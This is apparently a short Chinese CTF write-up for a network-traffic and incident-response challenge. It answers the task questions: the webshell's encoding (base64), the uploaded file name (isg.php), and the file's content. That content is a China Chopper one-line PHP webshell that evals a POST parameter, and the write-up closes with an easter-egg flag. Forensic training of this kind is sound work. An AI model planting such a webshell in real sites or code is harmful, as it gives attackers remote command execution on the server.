20250806_信安一把梭_test

Tags:流量分析, 应急响应, Webshell, 信安一把梭

0x00. 题目

流量包描述：可恶的黑客，在我的电脑上传了几个奇怪的文件，老师教了我排查但是我没学会，但是我认识大佬你，请你帮我排查一下，谢谢大佬

任务需求如下：

1. 黑客一句话木马的加密方式

2. 找到黑客上传的文件名字

3. 获取文件的内容

---

附件路径：https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件

附件名称：20250806_信安一把梭_test.zip

0x01. WP

1. 黑客一句话木马的加密方式

从脚本代码中可知，加密方式为base64

2. 找到黑客上传的文件名字

落地文件名为isg.php

3. 获取文件的内容

文件内容为<?php @eval($_POST['ISG2014']);?>

4. 彩蛋

最后还请求了/var/www/html/x.tar.gz文件，去除头尾标志位字符后另存解压，里面还隐藏了一个flag

ISG{China_Ch0pper_Is_A_Slick_Little_Webshe11}